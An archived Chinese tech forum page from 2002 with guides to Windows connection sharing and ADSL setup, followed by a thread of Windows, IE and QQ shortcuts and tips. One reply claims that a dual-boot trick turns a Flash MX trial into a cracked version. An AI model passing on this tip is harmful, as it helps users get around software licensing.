在Win98SE没有出现以前，大家都在使用Sygate、Wingate等网关工具来实现上网共享。Win98SE（第二版）本身也包含了共享上网工具——“Internet连接共享”，它的功能虽不如Wingate等软件来得强大，但却非常实用。

    在使用之前，大家必须先配置好自己的局域网，注意这个局域网必须是建立在TCP/IP协议的基础上，用IPX/SPX协议无法实现Internet共享功能，配置的局域网可ping一下主机的IP地址和本地的IP地址，以检查局域网是否工作正常（主机和本地的IP地址可由winipcfg这个命令得到）。

    一、主机的安装

    “Internet连接共享”主机上必须安装下述组件：

    Microsoft网络用户

    Internet连接共享

    拨号适配器（Internet适配器）

    第二个网络适配器（本地网卡）

    “Internet连接共享”和本地适配器的TCP/IP

    Internet连接共享需要最后安装，等一切设置好，并且设立了拨号连接，而且最好选择保存口令选项后，最后再装Internet连接共享。

    1.安装Internet连接共享

    打开“Windows安装程序”选项卡下的“添加/删除程序属性”对话框。

    单击“Internet工具”，然后单击“详细资料”。

    选择“Internet连接共享”，然后单击“确定”。

    按照“Internet连接共享向导”的提示进行操作。

    如果是第一次使用，系统自动启动“Internet连接共享向导”。“Internet连接共享向导”将连接共享计算机的IP地址设置为192.168.0.1。网络上的其他计算机可以静态设置为192.168.0.2到192.168.0.253之间的任何IP地址。期间会让你选择主机的上网方式、上网自动运行的拨号连接以及上Internet所用的网络适配器。最后会要求插入一张软盘，做网络其他计算机的共享配置磁盘。用这张软盘就可以自动配置共享上网用户。

    系统重新启动后，单击“开始”，指向“设置”，单击“控制面板”，然后再双击“Internet选项”，单击“连接”选项卡，看到“局域网设置”下多了个“共享”按钮，打开“共享”按钮，便是如下选择：

    选项 描述

    启用Internet连接共享（打钩选择） 打开或关闭该计算机上的Internet连接共享。

    在任务栏显示图标 向系统区内添加Internet连接共享。图标实时指明相互连接的计算机数量，同时还包括Internet连接共享选项的快捷菜单。

    选择用来访问Internet的拨号连接 选择首选选项。

    选择用来访问您的局域网络的网络适配器 选择首选选项。

    二、客户机的安装

    在每一台客户端计算机上必须安装下述组件：

    Microsoft网络用户

    网络适配器（本地网卡）

    TCP/IP

    （1）软盘配置：

    1.将在连接共享计算机上安装Microsoft Internet连接共享时制作的软盘插入您的的软盘驱动器中。

    2.单击“开始”按钮，然后单击“运行”。

    3.键入：a:\icsclset.exe

    4.单击“确定”。

    （2）TCP/IP设置：

    要使用连接共享计算机访问Internet，请按照下述步骤确保将网络适配器的TCP/IP设置正确。

    1.在“控制面板”中，双击“网络”图标。

    2.在“网络组件”列表中，单击与您的网络适配器有关联的TCP/IP，然后单击“属性”。

    3.选中“自动获取IP地址”复选框。

    4.单击“WINS配置”选项卡，然后选中“使用DHCP进行WINS解释”旁边的复选框。

    5.单击“网关”选项卡，然后删除可能列出的所有已安装的网关。

    6.单击“DNS配置”选项卡，然后选中“禁用DNS”旁边的复选框。

    7.单击“确定”接受新的TCP/IP设置。

    8.单击“确定”更新新的网络配置。

    另外对可以连接到Internet的应用程序进行配置（如Internet Explorer或Outlook Express），使用局域网络而不是直接连接到Internet。

    好了一切就绪，Win98SE的Internet连接共享最大的特点是不管主机是否上网，局域网上的机器都会自动调用主机的拨号连接，非常的方便，不过前提是主机必须预先配置好拨号连接，并让系统记口令。

[b]如何在WIN2000下设置和共享ADSL [b]

http://soft.km169.net/soft/tip/win2kadsl.htm

    ADSL的硬设备安装其实并没有多少奥妙，简单说就是用一块网卡把电脑和ADSL MODEM连接起来而已。而且ADSL的入户安装，大多数线路提供商都将专门派遣技术人员到用户家中去现场安装、调试，根本用不着用户亲力而为，故在此就不再多说。本文重点介绍的将是在Windows 2000环境下的个人用户和在局域网中如何使用ADSL的设置方法（在WIN98下的具体设置方法，ADSL自带用户手册中有详细的介绍）。

（注：本文以国内最常见的Alcatel ADSL MODEM为例，以下设置方法同样适用于普通单机用户。）

1.首先在桌面上用鼠标右键点击“网上邻居”，弹出快捷菜单，选中“属性”选项。

2.点击“属性”选项，打开“网络和拨号连接”窗口，用鼠标右键点击“本地连接”，选中“属性”选项。

3.点击“属性”选项，打开“本地连接属性”窗口，选中组件窗口中的“Internet协议（TCP/IP）”，选中“属性”选项。

4.点击“属性”选项，打开“Internet协议（TCP/IP）属性”窗口，填入内部局域网的IP地址以及子网掩码，点击“确定”（填入的DNS服务器地址由当地ISP预先提供）。

5.在“网络和拨号连接”窗口中，右键点击“新建连接”图标，选中“新建连接（N）…”。

6.点击“新建连接（N）…”，打开“网络连接向导”窗口。

7.点击“下一步”，在“如下选择”中选中“通过Internet连接到专用网络一项”。

8.点击“下一步”，在地址栏中填入连接服务器端的地址（填入的IP地址由当地ISP预先提供）。

9.点击“下一步”，如果是单机上网选择“只是我自己使用此连接”，局域网则选“所有用户使用此连接”。

10.点击“下一步”，并在空白处键入连接名称为连接取名，最后点击“完成”。

11.点击“连接***”图标，打开“连接***”窗口，选中并点击“属性”选项。

12.在打开的窗口中的常规中再次填入连接的主机服务器的地址（填入的IP地址由当地ISP预先提供） 。

13.点击“安全措施”，在该选项卡中选中“高级”。

14.点击“设置”按钮，在“数据加密”中选取“可选加密（没有加密也可以连接）”，再选取“允许这些协议”中“不加密的密码（PAP)”。

15.点击“确定”，在弹出的窗口中点击“是（Y）”。

16.在“网络”选项卡中的组件窗口选中“Internet协议（TCP/IP）”，并点击“属性”。

17.在属性窗口中选择“自动获得IP地址”和“自动获得DNS地址”，并点击“高级（V）…”。

18.在“高级TCP/IP设置”窗口中的“常规”选项卡中选择“在远程网络上使用默认网关”（必须），之后点击“确定”结束。

完成上面的设置后就可以进行拨号过程了。值得注意的是，Ericsson ADSL MODEM的设置和Alcatel ADSL MODEM有少许不同，Ericsson 的设置中不再需要定制“本地连接”，其他设置与 Alcatel ADSL MODEM设置基本类似。

宠辱不惊，坐看庭前花开花落；去留无意，任天上云卷云舒......

Blueidea Web Team.
Moderator Of Computer Technology Forum

clarkhe

初级用户
积分：42
发帖：10
来自：
资格：2002-05-02
 发表于 2002-05-04 10:53:46 按此观看clarkhe的个人资料 按此发邮件给clarkhe 发送悄悄话给clarkhe 编辑/删除帖子 将本帖子内容输出到 ActiveContent
fanbl在上个帖子中说
引用:
为什么我的机器,主机IP设为192.168.0.1后.其它机器不设IP可共享上网.如果其它机器设了IP如192.168.0.2等后不能共享上网.不论是win98,winxp还是win2k我都试过.都是这样.为什么呀?

这是微软的ics连接共享，它是DHCP+NAT+(DNS)，主要适用于小型企业和家庭用户，
server ip会自动被分配为192.168.0.1，clients端会自动获得ip :) :)

人活着要有点精神，好好活着，为了自己
say1no2

初级用户
积分：23
发帖：5
来自：
资格：2002-05-08
 发表于 2002-06-03 08:13:44 按此观看say1no2的个人资料 按此发邮件给say1no2 发送悄悄话给say1no2 编辑/删除帖子 将本帖子内容输出到 ActiveContent
我安装了所有需要的协议，但是找不到“Internet连接共享 ”协议，请问是为什么？

51windows

海娃
积分：4495
发帖：1308
来自：湖南－山东
资格：2001-12-02
 发表于 2002-06-03 08:21:36 按此观看51windows的个人资料 按此发邮件给51windows 访问51windows的主页 51windows 的 oicq 是528173,查看 528173 的资料 发送悄悄话给51windows 编辑/删除帖子 将本帖子内容输出到 ActiveContent
要在控制面板中添加！

Blueidea Web Team.
Moderator Of Amphitheater Forum
.::天天学习:好好向上::. www.51windows.com
51window_asp_Beta

这是个归档主题，您不能回复！
管理选项： 移动归档主题 | 删除归档主题


＠好技巧、新发现(欢迎大家参与)！ - 经 典 论 坛

计算机技术
＠好技巧、新发现(欢迎大家参与)！ (页 2)

这个主题共有2页：1 2 上一贴 | 下一贴
发表人 主题: ＠好技巧、新发现(欢迎大家参与)！
逍遥闪客

终级用户
积分：698
发帖：214
来自：闪客一族
注册：2002-06-19
 发表于 2002-06-21 12:18:30 按此观看逍遥闪客的个人资料 按此发邮件给逍遥闪客 访问逍遥闪客的主页 逍遥闪客 的 oicq 是82647353,查看 82647353 的资料 发送悄悄话给逍遥闪客 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看逍遥闪客的IP
输入网址不被记录
上网时在地址栏内输入网址，系统会记录下来，虽然方便以后不用再重复，不过如果是公用的机子，又不想让别人知道自己到过哪些地方，可以用“CTRL＋O（字母O，不是0）”，这时对弹出一个“打开”对话框，在其中的地址栏内输入网址，就不会被记录下来了

Alt+F4也可以关窗口
介绍一些热键
windows+e 资源管理器
windows+r 运行
windows+f 查找
windows+u 关闭系统
选中文件或对象：
ctrl+x 剪切
ctrl+c 复制
ctrl+v 粘贴
ctrl+z 撤消
alt+enter 查看属性

对鼠标不太好的 同志可以安装附加选项，用键盘上很少用的数字键代替鼠标

养成用 ctrl+W 关窗口的好习惯：）一见大事不妙就马上按。。。

[这消息被51windows编辑过(编辑时间2002-06-21 14:15:13)]

__________FLASHSJ 间谍㈦㈢㈥㈤和伐木工的兄弟!__________
FLASH专业论坛“闪客一族”http://flashsj.yeah.net
剑气凌人

剑气zzZZZZ
积分：2002
发帖：797
来自：剑窟
注册：2001-12-17
 发表于 2002-06-21 12:22:58 按此观看剑气凌人的个人资料 按此发邮件给剑气凌人 访问剑气凌人的主页 剑气凌人 的 oicq 是6646489,查看 6646489 的资料 发送悄悄话给剑气凌人 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看剑气凌人的IP
IE快捷
F4，按了后就知道可以打开地址拦的下拉选择网址
F6或ALT+D选择地址拦

人生一半随机，一半随缘！
人生如刻印，当入石三分！
欢迎光临企鹅频道
cgang580925

高级用户
积分：170
发帖：43
来自：沪
注册：2002-03-09
 发表于 2002-06-22 19:57:04 按此观看cgang580925的个人资料 按此发邮件给cgang580925 发送悄悄话给cgang580925 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看cgang580925的IP
此栏目较好，不过有点乱，是否分门别类为好。
啸

无意
现任版主
积分：6219
发帖：2154
来自：
注册：2000-08-01
 发表于 2002-06-22 23:13:04 按此观看啸的个人资料 按此发邮件给啸 发送悄悄话给啸 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看啸的IP
cgang580925在上个帖子中说
引用:
此栏目较好，不过有点乱，是否分门别类为好。

http://www.blueidea.com/doc/other/tip/00000420.htm

暂时整理得还比较粗糙，以后会好的，请大家见谅。

休整一段时间。

Blueidea Web Team.
Moderator Of Computer Technology Forum

imacwei

终级用户
积分：2344
发帖：1077
来自：China.Jiangs
注册：2001-07-23
 发表于 2002-06-23 09:21:00 按此观看imacwei的个人资料 按此发邮件给imacwei 访问imacwei的主页 imacwei 的 oicq 是36110975,查看 36110975 的资料 发送悄悄话给imacwei 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看imacwei的IP
1.在安装完XP后，关掉休眠功能，能够节省大量的空间(硬盘大的无所谓)
2.XP中间的视觉效果，关掉常用任务后，速度改进最明显，大家可以试试看(机器快的无所谓)
3.如果要改变XP的外观，使用Stylexp最方便，如果直接拷贝进入Themes文件夹，可能无法使用视觉效果

Loading…………
WINDOWS2000-SP2+IE5.5
FIREWORKS,the solution for professional Web graphic design and production.
Press Anykey To Continue…

iMacWei
ImHow

怎样
积分：2446
发帖：648
来自：::HowHome::
注册：2002-01-16
 发表于 2002-06-23 12:34:45 按此观看ImHow的个人资料 按此发邮件给ImHow 访问ImHow的主页 ImHow 的 oicq 是16407971,查看 16407971 的资料 发送悄悄话给ImHow 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看ImHow的IP
1。如果你用foxmail，邮箱路径不在默认位置，可以修改account.cfg
2。NTFS分区上文件属性中有个“摘要”功能，很有用的，这样一些软件安装程序是什么东东就不会忘了啊
3。IE的“选项”-“高级”中有个“禁止脚本调试”，选中之后浏览一些站点就不会因为站点的脚本文件有错而跳出讨厌的调试窗口了

::古落根门::

唯有不断学习 才能不断进步

静电论坛

Arctic Jiang
积分：2520
发帖：937
来自：ShenZhen
注册：2001-07-24
 发表于 2002-06-23 14:48:05 按此观看静电论坛的个人资料 按此发邮件给静电论坛 访问静电论坛的主页 静电论坛 的 oicq 是19042988,查看 19042988 的资料 发送悄悄话给静电论坛 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看静电论坛的IP
局域網中如何背著老闆和同事互通消息？在沒有連入internet的情況下，qq,msn都不好用了。
我們是這樣做的，開始--〉run--〉敲入命令：

net send pc15 "新來的女同事好靚啊！泡她！^_^"

就搞定！（注：pc15是我在局域網中的計算機名）

www.myTTF.com
lster

超级用户
积分：369
发帖：137
来自：陕西，中国
注册：2001-08-22
 发表于 2002-06-23 21:55:53 按此观看lster的个人资料 按此发邮件给lster lster 的 oicq 是2516449,查看 2516449 的资料 发送悄悄话给lster 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看lster的IP
在IE的地址栏输入： javescript:alert(document.lastModified)
便可以了解网页的更新日期。非常有用的功能，我经常使用，大家试试！

If winter comes , can spring be far behind ? come on.....
POPOEVER

N个蓝色大泡泡
版主
积分：22057
发帖：6043
来自：Keyframe
注册：2000-07-17
 发表于 2002-06-23 22:13:08 按此观看POPOEVER的个人资料 按此发邮件给POPOEVER 访问POPOEVER的主页 POPOEVER 的 oicq 是54888059,查看 54888059 的资料 发送悄悄话给POPOEVER 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看POPOEVER的IP
关于QQ安装后IE图标被QQ的tencent浏览器图标替换，不知道大家怎么解决的，我都是用笨办法：
安装好后把整个tencent目录复制到其他位置备份，然后卸载QQ，再把快捷指到备份的那个去就OK了

XTree
无可救药地活着，睡眼朦胧地醒着
世界杯决赛那天我过30岁生日，不冲突吧...

Blueidea Web Team
Moderator Of DW & JS Forum
Chief Police Officer

51windows

海娃
积分：4489
发帖：1308
来自：湖南－山东
注册：2001-12-02
 发表于 2002-06-24 00:59:42 按此观看51windows的个人资料 按此发邮件给51windows 访问51windows的主页 51windows 的 oicq 是528173,查看 528173 的资料 发送悄悄话给51windows 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看51windows的IP
to:静电论坛
好像只能用2000、xp系统中

to:泡泡
Internet选项，程序，重置......

我装在其它盘上，重装系统也不用再装，而且把那个浏览器换成IE了！

[这消息被51windows编辑过(编辑时间2002-06-24 01:13:25)]

Blueidea Web Team.
Moderator Of Amphitheater Forum
.::天天学习:好好向上::. www.51windows.com
51window_asp_Beta

wangjac

终级用户
积分：581
发帖：221
来自：CM
注册：2002-01-21
 发表于 2002-06-24 07:23:00 按此观看wangjac的个人资料 按此发邮件给wangjac 发送悄悄话给wangjac 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看wangjac的IP
POPOEVER在上个帖子中说
引用:
关于QQ安装后IE图标被QQ的tencent浏览器图标替换，不知道大家怎么解决的，我都是用笨办法：
安装好后把整个tencent目录复制到其他位置备份，然后卸载QQ，再把快捷指到备份的那个去就OK了

文件夹选项>文件类型>高级>更改图标

YO SOY EL Diego!
POPOEVER

N个蓝色大泡泡
版主
积分：22057
发帖：6043
来自：Keyframe
注册：2000-07-17
 发表于 2002-06-24 13:24:32 按此观看POPOEVER的个人资料 按此发邮件给POPOEVER 访问POPOEVER的主页 POPOEVER 的 oicq 是54888059,查看 54888059 的资料 发送悄悄话给POPOEVER 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看POPOEVER的IP
你们说的办法都没用的，难道你们没试过？

XTree
无可救药地活着，睡眼朦胧地醒着
世界杯决赛那天我过30岁生日，不冲突吧...

Blueidea Web Team
Moderator Of DW & JS Forum
Chief Police Officer

wangjac

终级用户
积分：581
发帖：221
来自：CM
注册：2002-01-21
 发表于 2002-06-24 13:43:39 按此观看wangjac的个人资料 按此发邮件给wangjac 发送悄悄话给wangjac 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看wangjac的IP
偶用过了，可以呀
例如
改前

改中

改后

[这消息被wangjac编辑过(编辑时间2002-06-24 13:56:33)]

YO SOY EL Diego!
ImHow

怎样
积分：2446
发帖：648
来自：::HowHome::
注册：2002-01-16
 发表于 2002-06-24 15:48:27 按此观看ImHow的个人资料 按此发邮件给ImHow 访问ImHow的主页 ImHow 的 oicq 是16407971,查看 16407971 的资料 发送悄悄话给ImHow 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看ImHow的IP
静电论坛在上个帖子中说
引用:
局域網中如何背著老闆和同事互通消息？在沒有連入internet的情況下，qq,msn都不好用了。
我們是這樣做的，開始--〉run--〉敲入命令：

net send pc15 "新來的女同事好靚啊！泡她！^_^"

就搞定！（注：pc15是我在局域網中的計算機名）

注意这个功能需要双方都打开mesage服务

::古落根门::

唯有不断学习 才能不断进步

sony

终级用户
积分：1222
发帖：329
来自：浙江省
注册：2001-10-05
 发表于 2002-06-24 20:05:44 按此观看sony的个人资料 按此发邮件给sony sony 的 oicq 是27869008,查看 27869008 的资料 发送悄悄话给sony 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看sony的IP
大家可能忽略了QQ中短消息还可以用alt+s来发. 下载还可以用目标另存为... 98下使用internet选项安全这一项还有更方便的方法双击IE状态栏上的internet小地球即可。 还有在winxp下，windows键+L即可锁住机器,同时还可以预览开机LOG. 要更改系统图标的方法很多但推荐大家使用IconPackager, 不仅可以单个改还可以整套的改。大家不知道发现没有利用双系统还可以破解某些应用程序比如在98下装flash MX的试用版，在2000下如输入序列号后就变成了破解版。

许多夜晚，你轻柔地依偎在我的身上，用纤纤秀手触摸我身上娇嫩的地方，用小巧细嘴吸出我珍贵的体液，直到满足十分才肯松口离开，唉，这该死的蚊子。
epie

终级用户
积分：1113
发帖：305
来自：苏州|哈尔滨
注册：2001-09-14
 发表于 2002-06-25 15:30:11 按此观看epie的个人资料 按此发邮件给epie 访问epie的主页 epie 的 oicq 是1491135,查看 1491135 的资料 发送悄悄话给epie 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看epie的IP
技巧类
1.通过网络共享时，尽量使用"运行"，\\ip地址\共享文件名，而不要使
用通过“网上邻居”浏览访问，速度很慢，而且经常不全（特别是2000，xp)，还要注意适当的运用$

2.在98下快速做启动盘，只要把windows/command/edb下的所有文件复
制到干净的软盘中就可以做98启动盘

3.运行pq分区失败，出现不可识别的分区，只要找到pq安装目录
UTILITY的PTEDIT32.EXE，可以把原分区还原为原来格式

4.打开资源管理器，选中文件夹，用小键盘的*,可以把这个文件夹中的
所存在的所有子文件夹迅速列出。

5.QQ自己加自己的方法：在黑名单中加自己，然后再把自己拖到我的好
友中就可以了

软件类
1。免费小软件CommandBarSetup
可以在方便的使用在资源管理器中使用cmd窗口，而不必运行cmd才能看
到cmd窗口，对于经常接触网络的朋友，是个不错的选择哦
http://www.codeproject.com/csharp/CommandBar.asp?msg=198
411&mode=all&userid=35980

www.epie.net
若是有空的话，注册个用户吧
POPOEVER

N个蓝色大泡泡
版主
积分：22057
发帖：6043
来自：Keyframe
注册：2000-07-17
 发表于 2002-06-25 18:07:09 按此观看POPOEVER的个人资料 按此发邮件给POPOEVER 访问POPOEVER的主页 POPOEVER 的 oicq 是54888059,查看 54888059 的资料 发送悄悄话给POPOEVER 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看POPOEVER的IP
wangjac在上个帖子中说
引用:
偶用过了，可以呀
例如
改前

改中

改后

XP我不清楚，反正2000pro从来就改不过来，也真是怪，所以就出这个馊主意。不过QQ安装后会改很多东西，一个个手动改挺累的，还不如我这样爽快

XTree
无可救药地活着，睡眼朦胧地醒着
世界杯决赛那天我过30岁生日，不冲突吧...

Blueidea Web Team
Moderator Of DW & JS Forum
Chief Police Officer

wangfeng

超级用户
积分：330
发帖：102
来自：辽宁
注册：2001-12-23
 发表于 2002-06-25 21:25:08 按此观看wangfeng的个人资料 按此发邮件给wangfeng 访问wangfeng的主页 wangfeng 的 oicq 是56202481,查看 56202481 的资料 发送悄悄话给wangfeng 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看wangfeng的IP
在qq里设置ctrl+alt+z和ctrl+alt+a 多舒服啊

如果怕人看见 ，就在设置里不在任务栏上显示 然后带上耳机 听信息
如果怕人听见，就把设置里把声音关了
如果特别怕人，只好全设置了 然后靠感觉来收信息了

我曾经问个不休？………………………………………………？
painming2002

初级用户
积分：48
发帖：13
来自：
注册：2002-06-13
 发表于 2002-06-26 11:28:52 按此观看painming2002的个人资料 按此发邮件给painming2002 painming2002 的 oicq 是15860094,查看 15860094 的资料 发送悄悄话给painming2002 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看painming2002的IP
最小化所有窗口：win+d
关闭窗口：ctrl+w

别人笑我太疯癫，
我笑他人看不穿。
xiayupei

初级用户
积分：58
发帖：15
来自：G省
注册：2002-01-11
 发表于 2002-06-27 17:42:29 按此观看xiayupei的个人资料 按此发邮件给xiayupei xiayupei 的 oicq 是8628230,查看 8628230 的资料 发送悄悄话给xiayupei 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看xiayupei的IP
潜水员在上个帖子中说
引用:
浏览器相关：
无边窗口，没有菜单栏，禁止用右键，怎么保存页面？

CTRL+N，新开窗口即可。

我也凑个热闹，禁止用右键，可先击左键，后再按右键，等几秒后便可存储想要的图片等。（有的页面不大管用，因不大懂代码，所以没有深究过。）

人，被太阳照射出来的影子都是一样。
learnercl

初级用户
积分：33
发帖：9
来自：HRB
注册：2002-03-27
 发表于 2002-06-27 22:52:41 按此观看learnercl的个人资料 该用户不允许显示它的电子邮件 learnercl 的 oicq 是64707230,查看 64707230 的资料 发送悄悄话给learnercl 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看learnercl的IP
最小化所有窗口：Win+D　或　Win+M

Win+D：按Win+D最小化所有窗口后，再按一次Win+D可回到最小化前的窗口

Win+M：按Win+M最小化所有窗口，但再按一次无法像Win+D那样回到最小化前的窗口

IE浏览相关

1、PageUp / Shift+空格键－－－使页面向上滚动一屏

2、PageDown / 空格键－－－使页面向下滚动一屏

3、键盘的上/下/左/右方向键可以控制浏览器的滚动条（即如果你想让页面向上滚动，可以按上方向键，点腻了鼠标，就试一试这种方法吧！）

4、Ctrl+Home－－－到达页首 / Ctrl+End－－－到达页尾

5、F11键－－－使浏览器全屏显示当前页面（只在屏幕最上方显示一行工具栏；另外可以右击鼠标，在弹出的快捷菜单中选择“自动隐藏”，这样可以实现“真正”的全屏的显示）

[这消息被learnercl编辑过(编辑时间2002-06-28 13:40:01)]
[这消息被learnercl编辑过(编辑时间2002-06-28 13:44:15)]

路漫漫其修远兮，吾将上下而求索。
learnercl

初级用户
积分：33
发帖：9
来自：HRB
注册：2002-03-27
 发表于 2002-06-27 23:05:49 按此观看learnercl的个人资料 该用户不允许显示它的电子邮件 learnercl 的 oicq 是64707230,查看 64707230 的资料 发送悄悄话给learnercl 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看learnercl的IP
如果浏览的页面中应用了JavaScript禁用了鼠标右键，解决的方法：

1、如“xiayupei”的方法，先按住鼠标左键，然后将鼠标移动到目标处，点击鼠标右键，一两秒之后，快捷菜单出现

2、单击鼠标右键，（不要放开鼠标右键），将鼠标移到警告窗口处，点击鼠标左键，关闭窗口，再将鼠标移回目标处，放开鼠标右键，快捷菜单出现

路漫漫其修远兮，吾将上下而求索。
lster

超级用户
积分：369
发帖：137
来自：陕西，中国
注册：2001-08-22
 发表于 2002-06-29 06:26:36 按此观看lster的个人资料 按此发邮件给lster lster 的 oicq 是2516449,查看 2516449 的资料 发送悄悄话给lster 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看lster的IP
系统中SHIFT键技巧小总结

1>选择多个文件、文件夹：

    要选择多个文件时，先选中首文件，然后按住Shift选择最后一个文件，这样这两个文件之间的文件将全部被选中，你还可以利用Shift和方向键进行选择。此快捷键在资源管理器、对话框中都适用，同时也适合于文件夹的选择。

    2>彻底删除文件、文件夹：

    在删除文件、文件夹时，按下Shift＋Del组合键，确认回车，可以直接删除文件，而不是将文件放入回收站。

    3>关闭所有文件夹窗口：

    如果你打开文件夹的是，选择在不同窗口打开不同的文件夹。按住Shift键后单击关闭按钮将关闭该文件夹窗口及其所有上级文件夹窗口。 在打开文件时按住Shift键，可以将文件在新的窗口打开。

    4>跳过启动程序：

    在Win98启动时按住Shift键直到启动完毕，可取消自动启动程序功能，并且跳过硬件检测，达到快速启动。

    5>去掉CD自动播放：

    在放入CD光盘时按住Shift键，可以去掉其自动播放功能。

    6>快速重新启动：

    在关闭Win98时，按住Shift键，选择“重新启动计算机”，计算机将重新启动Win98而不执行热启动。此快捷键在更改设置后需要重新启动系统时非常实用，减少启动的等待时间。

    7>强制移动：

    对于某些由于有属性而无法进行移动的文件或文件夹，可以在移动时按住Shift键，达到强行移动的效果。

    8>切换全/半角状态：

    按下Shift＋空格键。

    9>切换粘滞键开关：

    按下Shift键5次。

    10>快速粘贴对象：

    不论是在编辑框中还是在标准Windows应用程序中，同时按下Shift+Insert键，即可从剪贴板上粘贴内容。

    11>改变文件的关联：

    当遇到某个文件不想以它的默认程序打开时，按住Shift，点击鼠标右键，选择“打开方式”，在接下来的窗口中选择打开的程序即可。

    12>打开右键菜单：

    按住Shift＋F10，可以打开所选项目的右键菜单。

    13>创建快捷方式：

    按住 CTRL+SHIFT 拖动文件。

If winter comes , can spring be far behind ? come on.....
lster

超级用户
积分：369
发帖：137
来自：陕西，中国
注册：2001-08-22
 发表于 2002-06-29 06:44:42 按此观看lster的个人资料 按此发邮件给lster lster 的 oicq 是2516449,查看 2516449 的资料 发送悄悄话给lster 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看lster的IP
请点击:Windows 98应用技巧数则

不知道这样干,允许否?

If winter comes , can spring be far behind ? come on.....
鸦

超级用户
积分：361
发帖：118
来自：目前在广州
注册：2002-03-29
 发表于 2002-06-29 07:44:09 按此观看鸦的个人资料 按此发邮件给鸦 鸦 的 oicq 是4305331,查看 4305331 的资料 发送悄悄话给鸦 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看鸦的IP
在WIN下，按alt键不放点击文件或文件夹，可显示文件或文件夹属性~~

按WIN+e可快速打开“我的电脑”

在打开窗口时，按ctrl+e可出现“搜索”，按ctrl+h可调出“历史记录”

在ACDSEE里，当在全屏浏览一张图片模式时，按crtl+w可把图片设置为桌面背景~~

在PS和PM和AI软件中，可用ctrl+w关闭当前文件，用table来隐藏所有浮动工具栏
在PS中，可用“[”和“]”键来改变笔刷大小。

在FH和CDR中，可用ctrl+F4关闭当前文件
在FH中，可用F12来隐藏所有浮动工具栏，当然了，你也可以用自定义的快捷键。

另：附带一些苹果的~

按“苹果”+shift+3或4可快速拍照，其中一个相当于PC的print键，另一个则可以自己选择要“拍照”的大小，具体哪个是哪个我忘了~~

选择一个文件或文件夹，按“苹果”+I可显示所选文件或文件夹属性

在PS里，用GIF格式copy一个小图标后，再打开文件或文件夹属性，在图标栏里按“苹果”+v可把文件或文件夹图标换成你所复制的图标

按“苹果”+shift+W可关闭所有桌面上的窗口

按“苹果”+com+启动键可强制重启

苹果机和PC文件互用：
基本上，所有苹果和PC的软件都可以互相调用，只是，当苹果的软件要在PC上开时，需要手动在文件上加上相应的后辍名。

一时就想到这么多了~~~

[这消息被鸦编辑过(编辑时间2002-06-29 07:55:34)]
[这消息被鸦编辑过(编辑时间2002-06-29 07:56:49)]
[这消息被鸦编辑过(编辑时间2002-06-29 09:02:18)]

乌鸦永远是乌鸦~再怎么样也变不成凤凰……所以，平凡的乌鸦是自由的~也因此是孤独的……
阿修罗飞天舞

无关风月
现任版主
积分：2516
发帖：2473
来自：杭州
注册：2001-05-21
 发表于 2002-06-29 21:07:36 按此观看阿修罗飞天舞的个人资料 按此发邮件给阿修罗飞天舞 阿修罗飞天舞 的 oicq 是5194599,查看 5194599 的资料 发送悄悄话给阿修罗飞天舞 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看阿修罗飞天舞的IP
realplay多曲播放
选中多个曲目,然后拖到realplay 的播放地址栏就可以了
之后找到那个ram(会自动生成),复制里面的内容多遍就可以反复听歌曲

坐看秋草只须臾 秋夕惊鸿往日情 不忍萧瑟枯原景 思思念念无日月
随风散去荻上露 薄暮伤别彷若梦 秋日难留故人心 今年今生今日尽

Blueidea Web Team

51windows

海娃
积分：4489
发帖：1308
来自：湖南－山东
注册：2001-12-02
